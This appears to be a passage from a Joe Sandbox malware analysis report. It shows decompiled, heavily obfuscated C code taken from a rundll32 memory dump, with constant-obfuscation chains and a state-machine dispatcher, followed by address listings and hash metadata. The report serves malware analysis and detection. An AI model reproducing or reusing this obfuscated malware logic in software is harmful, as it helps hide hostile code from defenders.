				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E002E8F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x2f3e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E002D1CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E002E46BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E002D912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E002DD6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E002EDCF7(_v1616, 0x2d1020, __eflags);
									E002E176B( &_v1040, __eflags);
									_t503 =  *0x2f3e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E002E1652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E002DA8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E002E8F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}














































































                                                                                                                                  0x002e5cc4
                                                                                                                                  0x002e5cca
                                                                                                                                  0x002e5ce2
                                                                                                                                  0x002e5cea
                                                                                                                                  0x002e5cef
                                                                                                                                  0x002e5cf4
                                                                                                                                  0x002e5cf5
                                                                                                                                  0x002e5cf6
                                                                                                                                  0x002e5cfe
                                                                                                                                  0x002e5d06
                                                                                                                                  0x002e5d0e
                                                                                                                                  0x002e5d16
                                                                                                                                  0x002e5d1e
                                                                                                                                  0x002e5d2b
                                                                                                                                  0x002e5d2e
                                                                                                                                  0x002e5d31
                                                                                                                                  0x002e5d35
                                                                                                                                  0x002e5d3d
                                                                                                                                  0x002e5d45
                                                                                                                                  0x002e5d50
                                                                                                                                  0x002e5d58
                                                                                                                                  0x002e5d63
                                                                                                                                  0x002e5d6b
                                                                                                                                  0x002e5d7b
                                                                                                                                  0x002e5d7f
                                                                                                                                  0x002e5d87
                                                                                                                                  0x002e5d8f
                                                                                                                                  0x002e5d9c
                                                                                                                                  0x002e5da0
                                                                                                                                  0x002e5da8
                                                                                                                                  0x002e5db0
                                                                                                                                  0x002e5db8
                                                                                                                                  0x002e5dc0
                                                                                                                                  0x002e5dcd
                                                                                                                                  0x002e5dd1
                                                                                                                                  0x002e5dd9
                                                                                                                                  0x002e5de6
                                                                                                                                  0x002e5dea
                                                                                                                                  0x002e5dfa
                                                                                                                                  0x002e5dfe
                                                                                                                                  0x002e5e06
                                                                                                                                  0x002e5e11
                                                                                                                                  0x002e5e1c
                                                                                                                                  0x002e5e27
                                                                                                                                  0x002e5e2f
                                                                                                                                  0x002e5e34
                                                                                                                                  0x002e5e3d
                                                                                                                                  0x002e5e40
                                                                                                                                  0x002e5e44
                                                                                                                                  0x002e5e4c
                                                                                                                                  0x002e5e57
                                                                                                                                  0x002e5e62
                                                                                                                                  0x002e5e6d
                                                                                                                                  0x002e5e78
                                                                                                                                  0x002e5e80
                                                                                                                                  0x002e5e8b
                                                                                                                                  0x002e5e9a
                                                                                                                                  0x002e5ea4
                                                                                                                                  0x002e5ea9
                                                                                                                                  0x002e5eb3
                                                                                                                                  0x002e5eb8
                                                                                                                                  0x002e5ebc
                                                                                                                                  0x002e5ec4
                                                                                                                                  0x002e5ecf
                                                                                                                                  0x002e5eda
                                                                                                                                  0x002e5ee5
                                                                                                                                  0x002e5ef5
                                                                                                                                  0x002e5efb
                                                                                                                                  0x002e5f03
                                                                                                                                  0x002e5f0b
                                                                                                                                  0x002e5f16
                                                                                                                                  0x002e5f21
                                                                                                                                  0x002e5f2c
                                                                                                                                  0x002e5f37
                                                                                                                                  0x002e5f42
                                                                                                                                  0x002e5f4d
                                                                                                                                  0x002e5f60
                                                                                                                                  0x002e5f63
                                                                                                                                  0x002e5f66
                                                                                                                                  0x002e5f6d
                                                                                                                                  0x002e5f78
                                                                                                                                  0x002e5f80
                                                                                                                                  0x002e5f88
                                                                                                                                  0x002e5f90
                                                                                                                                  0x002e5f98
                                                                                                                                  0x002e5fa0
                                                                                                                                  0x002e5fa8
                                                                                                                                  0x002e5fb0
                                                                                                                                  0x002e5fb8
                                                                                                                                  0x002e5fc0
                                                                                                                                  0x002e5fcb
                                                                                                                                  0x002e5fd6
                                                                                                                                  0x002e5fe1
                                                                                                                                  0x002e5fec
                                                                                                                                  0x002e5ff7
                                                                                                                                  0x002e6002
                                                                                                                                  0x002e6012
                                                                                                                                  0x002e6016
                                                                                                                                  0x002e601e
                                                                                                                                  0x002e6026
                                                                                                                                  0x002e602e
                                                                                                                                  0x002e6033
                                                                                                                                  0x002e6040
                                                                                                                                  0x002e6044
                                                                                                                                  0x002e604c
                                                                                                                                  0x002e6058
                                                                                                                                  0x002e605b
                                                                                                                                  0x002e605f
                                                                                                                                  0x002e6067
                                                                                                                                  0x002e606f
                                                                                                                                  0x002e6077
                                                                                                                                  0x002e607f
                                                                                                                                  0x002e6084
                                                                                                                                  0x002e608e
                                                                                                                                  0x002e6096
                                                                                                                                  0x002e609c
                                                                                                                                  0x002e60a1
                                                                                                                                  0x002e60a5
                                                                                                                                  0x002e60ad
                                                                                                                                  0x002e60b5
                                                                                                                                  0x002e60bd
                                                                                                                                  0x002e60cd
                                                                                                                                  0x002e60d3
                                                                                                                                  0x002e60db
                                                                                                                                  0x002e60e0
                                                                                                                                  0x002e60e8
                                                                                                                                  0x002e60fb
                                                                                                                                  0x002e60fe
                                                                                                                                  0x002e6105
                                                                                                                                  0x002e6110
                                                                                                                                  0x002e6118
                                                                                                                                  0x002e6120
                                                                                                                                  0x002e6128
                                                                                                                                  0x002e6130
                                                                                                                                  0x002e6138
                                                                                                                                  0x002e6140
                                                                                                                                  0x002e6145
                                                                                                                                  0x002e614d
                                                                                                                                  0x002e6155
                                                                                                                                  0x002e615d
                                                                                                                                  0x002e616a
                                                                                                                                  0x002e616e
                                                                                                                                  0x002e6176
                                                                                                                                  0x002e617e
                                                                                                                                  0x002e6186
                                                                                                                                  0x002e6191
                                                                                                                                  0x002e619c
                                                                                                                                  0x002e61a7
                                                                                                                                  0x002e61af
                                                                                                                                  0x002e61b7
                                                                                                                                  0x002e61bf
                                                                                                                                  0x002e61c7
                                                                                                                                  0x002e61cf
                                                                                                                                  0x002e61da
                                                                                                                                  0x002e61e2
                                                                                                                                  0x002e61ed
                                                                                                                                  0x002e61f5
                                                                                                                                  0x002e61fd
                                                                                                                                  0x002e6202
                                                                                                                                  0x002e620a
                                                                                                                                  0x002e6212
                                                                                                                                  0x002e621a
                                                                                                                                  0x002e6224
                                                                                                                                  0x002e6228
                                                                                                                                  0x002e622d
                                                                                                                                  0x002e6235
                                                                                                                                  0x002e6240
                                                                                                                                  0x002e624b
                                                                                                                                  0x002e6256
                                                                                                                                  0x002e625e
                                                                                                                                  0x002e626e
                                                                                                                                  0x002e6272
                                                                                                                                  0x002e6277
                                                                                                                                  0x002e627f
                                                                                                                                  0x002e628b
                                                                                                                                  0x002e628e
                                                                                                                                  0x002e6297
                                                                                                                                  0x002e629b
                                                                                                                                  0x002e62a3
                                                                                                                                  0x002e62ab
                                                                                                                                  0x002e62b5
                                                                                                                                  0x002e62bd
                                                                                                                                  0x002e62c5
                                                                                                                                  0x002e62d0
                                                                                                                                  0x002e62db
                                                                                                                                  0x002e62e6
                                                                                                                                  0x002e62ee
                                                                                                                                  0x002e62f6
                                                                                                                                  0x002e62fe
                                                                                                                                  0x002e6306
                                                                                                                                  0x002e631b
                                                                                                                                  0x002e631c
                                                                                                                                  0x002e6323
                                                                                                                                  0x002e632a
                                                                                                                                  0x002e6331
                                                                                                                                  0x002e633c
                                                                                                                                  0x002e6344
                                                                                                                                  0x002e634f
                                                                                                                                  0x002e6356
                                                                                                                                  0x002e635a
                                                                                                                                  0x002e6362
                                                                                                                                  0x002e636d
                                                                                                                                  0x002e6378
                                                                                                                                  0x002e6383
                                                                                                                                  0x002e638e
                                                                                                                                  0x002e6396
                                                                                                                                  0x002e63a1
                                                                                                                                  0x002e63a1
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63ab
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63b1
                                                                                                                                  0x002e64ef
                                                                                                                                  0x002e64f4
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63b7
                                                                                                                                  0x002e63bd
                                                                                                                                  0x002e64bb
                                                                                                                                  0x002e64c1
                                                                                                                                  0x002e64c9
                                                                                                                                  0x002e64c9
                                                                                                                                  0x002e64cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64ce
                                                                                                                                  0x002e64d1
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63c3
                                                                                                                                  0x002e63c9
                                                                                                                                  0x002e649d
                                                                                                                                  0x002e649f
                                                                                                                                  0x002e64a2
                                                                                                                                  0x002e64a4
                                                                                                                                  0x002e64f7
                                                                                                                                  0x002e64f7
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e64a6
                                                                                                                                  0x002e64a6
                                                                                                                                  0x002e64ab
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63cb
                                                                                                                                  0x002e63d1
                                                                                                                                  0x002e6411
                                                                                                                                  0x002e641f
                                                                                                                                  0x002e6423
                                                                                                                                  0x002e6435
                                                                                                                                  0x002e6436
                                                                                                                                  0x002e643b
                                                                                                                                  0x002e643e
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63d3
                                                                                                                                  0x002e63d9
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63df
                                                                                                                                  0x002e63f8
                                                                                                                                  0x002e63fd
                                                                                                                                  0x002e63ff
                                                                                                                                  0x002e6404
                                                                                                                                  0x002e640a
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e6404
                                                                                                                                  0x002e63d9
                                                                                                                                  0x002e63d1
                                                                                                                                  0x002e63c9
                                                                                                                                  0x002e63bd
                                                                                                                                  0x002e6546
                                                                                                                                  0x002e6557
                                                                                                                                  0x002e6557
                                                                                                                                  0x002e6501
                                                                                                                                  0x002e6507
                                                                                                                                  0x002e6619
                                                                                                                                  0x002e661e
                                                                                                                                  0x002e6621
                                                                                                                                  0x002e6625
                                                                                                                                  0x00000000
                                                                                                                                  0x002e650d
                                                                                                                                  0x002e650d
                                                                                                                                  0x002e6513
                                                                                                                                  0x002e6558
                                                                                                                                  0x002e6564
                                                                                                                                  0x002e656f
                                                                                                                                  0x002e657d
                                                                                                                                  0x002e65bd
                                                                                                                                  0x002e65ca
                                                                                                                                  0x002e65ce
                                                                                                                                  0x002e65dc
                                                                                                                                  0x002e65f1
                                                                                                                                  0x002e65f6
                                                                                                                                  0x002e65f9
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6515
                                                                                                                                  0x002e6515
                                                                                                                                  0x002e651b
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6521
                                                                                                                                  0x002e653e
                                                                                                                                  0x002e6543
                                                                                                                                  0x002e651b
                                                                                                                                  0x002e6513
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6626
                                                                                                                                  0x002e6626
                                                                                                                                  0x002e6626
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6632
                                                                                                                                  0x002e63a6

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                                  • API String ID: 0-2231434368
                                                                                                                                  • Opcode ID: 9fee7601b5a1a9601d625c18c74ec453cd4f5a13f6c01c9a71d2a8b0184f7a32
                                                                                                                                  • Instruction ID: ba5dbd384b98db2d49d75cb65b4a43e29e0498b4b4d04172ae9c2c81514f15d7
                                                                                                                                  • Opcode Fuzzy Hash: 9fee7601b5a1a9601d625c18c74ec453cd4f5a13f6c01c9a71d2a8b0184f7a32
                                                                                                                                  • Instruction Fuzzy Hash: 73224271518380DFD768CF66C58AA9BFBE2FBC4744F50891DE29A86260D7B18849CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E6DF8 Relevance: 15.5, Strings: 12, Instructions: 510COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002E6DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
